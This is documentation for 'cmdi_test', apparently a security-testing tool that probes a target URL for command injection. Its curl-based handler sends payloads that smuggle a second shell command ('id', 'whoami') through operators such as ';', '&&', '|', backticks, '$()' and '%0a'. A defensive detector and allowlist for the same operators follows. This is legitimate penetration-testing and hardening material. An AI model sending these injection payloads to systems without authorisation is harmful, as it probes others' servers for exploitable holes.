cmdi_test
Test web applications for command injection vulnerabilities by sending payloads with common shell operators to detect insecure parameter processing.
Instructions
Test command injection using various shell operators. Tests the `;`, `&&`, `||`, `|`, backtick, `$()` and `%0a` (newline) operators with `id` and `whoami` as detection commands. Returns a results array with `operator`, `payload`, `status`, `output_snippet` and `likely_vulnerable` for each probe. Side effects: read-only detection commands only (`id`, `whoami`). Sends ~14 requests (two per operator).
Input Schema
| Name | Required | Description | Default |
|---|---|---|---|
| url | Yes | Target URL that processes the parameter server-side | |
| parameter | Yes | Vulnerable parameter name, e.g. 'storeId' | |
| base_value | No | Legitimate value for the parameter, e.g. '1' | |
| method | No | HTTP method | |
| operators | No | Injection operators to test. Default: all common operators. | |
Implementation Reference
- src/tools/cmdi.ts:22-97 (handler): the handler function for the `cmdi_test` tool. It builds two payloads per operator, sends each with curl, and marks a probe as `likely_vulnerable` when the response body contains a substring typical of `id`/`whoami` output. Note that this is a substring heuristic: strings such as `root` or `nginx` can appear in ordinary responses, so a hit needs manual confirmation before it is reported as a finding.

```typescript
async ({ url, parameter, base_value = "1", method = "POST", operators }) => {
  requireTool("curl");
  const defaultOperators = [";", "&&", "||", "|", "`", "$()", "%0a"];
  const testOperators = operators ?? defaultOperators;
  // Two read-only detection payloads per operator (id and whoami).
  const detectionCommands: Record<string, string[]> = {
    ";": [`${base_value};id`, `${base_value};whoami`],
    "&&": [`${base_value}&&id`, `${base_value}&&whoami`],
    "||": [`${base_value}||id`, `invalid||whoami`],
    "|": [`${base_value}|id`, `${base_value}|whoami`],
    "`": [`${base_value}\`id\``, `${base_value}\`whoami\``],
    "$()": [`${base_value}$(id)`, `${base_value}$(whoami)`],
    "%0a": [`${base_value}%0aid`, `${base_value}%0awhoami`],
  };
  const results = [];
  for (const op of testOperators) {
    if (!(op in detectionCommands)) {
      continue;
    }
    for (const payload of detectionCommands[op]) {
      let curlArgs: string[];
      if (method === "GET") {
        curlArgs = ["-sk", "-o", "-", "-w", "\n__STATUS__%{http_code}", `${url}?${parameter}=${payload}`];
      } else {
        curlArgs = ["-sk", "-o", "-", "-w", "\n__STATUS__%{http_code}", "-X", "POST", "-d", `${parameter}=${payload}`, url];
      }
      const res = await runCmd("curl", curlArgs);
      let body = res.stdout;
      // The -w format appends the HTTP status after the body; split it off again.
      const statusMarker = body.lastIndexOf("__STATUS__");
      let status = 0;
      if (statusMarker !== -1) {
        try {
          status = parseInt(body.slice(statusMarker + 10).trim(), 10);
        } catch {
          // leave status as 0
        }
        body = body.slice(0, statusMarker);
      }
      // Check for command output indicators
      const indicators = ["uid=", "gid=", "root", "www-data", "nobody", "apache", "nginx"];
      const likely = indicators.some((ind) => body.toLowerCase().includes(ind));
      results.push({
        operator: op,
        payload,
        status,
        output_snippet: body.slice(0, 300),
        likely_vulnerable: likely,
      });
    }
  }
  const vulnerableOps = [...new Set(results.filter((r) => r.likely_vulnerable).map((r) => r.operator))];
  const result = {
    results,
    vulnerable_operators: vulnerableOps,
    vulnerable: vulnerableOps.length > 0,
  };
  return { content: [{ type: "text" as const, text: JSON.stringify(result, null, 2) }] };
}
```

- src/tools/cmdi.ts:12-21 (registration): the registration of the `cmdi_test` tool with its input schema.

```typescript
server.tool(
  "cmdi_test",
  "Test command injection using various shell operators. Tests ;, &&, ||, |, backtick, $(), and %0a (newline) operators with 'id' and 'whoami' as detection commands. Returns results array with operator, payload, status, output_snippet, likely_vulnerable. Side effects: Read-only detection commands (id, whoami). Sends ~14 requests.",
  {
    url: z.string().describe("Target URL that processes the parameter server-side"),
    parameter: z.string().describe("Vulnerable parameter name, e.g. 'storeId'"),
    base_value: z.string().optional().describe("Legitimate value for the parameter, e.g. '1'"),
    method: z.enum(["GET", "POST"]).optional().describe("HTTP method"),
    operators: z.array(z.string()).optional().describe("Injection operators to test. Default: all common operators."),
  },
```
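The defender-side counterpart to these probes, as an added example that is not part of the `cmdi_test` tool or its repository: a detector for the same seven operators in an incoming parameter value (usable for request logging or an alert rule) and an allowlist check that produces a file-plus-argv pair for an `execFile`-style call instead of a shell string, which is what removes the vulnerability the tool looks for. The digit-only `storeId` format, the `stockreport` binary path and all function names are assumptions.

```typescript
// Added example, not part of cmdi_test. Binary path and the digit-only
// storeId format are assumptions for illustration.

// The seven operators cmdi_test sends, matched on the raw parameter value.
// "%0a" is checked both URL-encoded and as a literal newline, because the
// web framework may already have decoded it before a handler sees it.
const CMDI_OPERATORS: Array<[string, (v: string) => boolean]> = [
  [";", (v) => v.includes(";")],
  ["&&", (v) => v.includes("&&")],
  ["||", (v) => v.includes("||")],
  ["|", (v) => v.replace(/\|\|/g, "").includes("|")], // single pipe only
  ["`", (v) => v.includes("`")],
  ["$()", (v) => v.includes("$(")],
  ["%0a", (v) => /%0a|\n/i.test(v)],
];

// Returns the operator names present in a value, e.g. "1;id" -> [";"].
// Intended for logging or alerting on a request before it reaches business code.
export function detectCmdiOperators(value: string): string[] {
  return CMDI_OPERATORS.filter(([, present]) => present(value)).map(([name]) => name);
}

// Allowlist validation: a store id is 1-9 ASCII digits and nothing else.
// Rejecting on format (rather than blocklisting operators) also covers
// encodings the operator list above does not enumerate.
export function isValidStoreId(value: string): boolean {
  return /^[0-9]{1,9}$/.test(value);
}

// Builds the command as file + argv array so the caller can run it with
// child_process.execFile: no shell is involved, so no operator is ever
// interpreted. Throws on any value that fails the allowlist.
export function buildStockCommand(storeId: string): { file: string; args: string[] } {
  if (!isValidStoreId(storeId)) {
    const ops = detectCmdiOperators(storeId);
    throw new Error(
      `rejected storeId ${JSON.stringify(storeId)}` +
        (ops.length ? ` (shell operators: ${ops.join(" ")})` : ""),
    );
  }
  // Hypothetical report binary; storeId travels as its own argv element.
  return { file: "/usr/local/bin/stockreport", args: ["--store", storeId] };
}
```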